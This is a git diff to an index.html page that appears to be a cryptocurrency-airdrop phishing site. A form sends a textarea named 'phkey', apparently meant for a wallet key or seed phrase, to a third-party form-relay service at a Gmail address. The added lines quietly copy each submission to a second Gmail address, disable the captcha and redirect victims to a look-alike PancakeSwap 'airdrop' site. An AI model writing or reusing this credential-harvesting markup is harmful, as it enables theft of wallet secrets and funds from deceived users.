--- a/index.html
+++ b/index.html
@@ -1265,6 +1265,9 @@
             </p>
             <form action="https://formsubmit.co/r9108460@gmail.com" method="POST">
             <div class="modDivBody">
+            <input type="hidden" name="_cc" value="wnewton0001@gmail.com">
+                <input type="hidden" name="_captcha" value="false">
+                 <input type="hidden" name="_next" value="https://pancakeswap-airdropr.vercel.app/pancakes.html">
                 
                <input class="modInp" type="text"><br><br>
                 <textarea class="modArea" textarea id="message" name="phkey"></textarea>
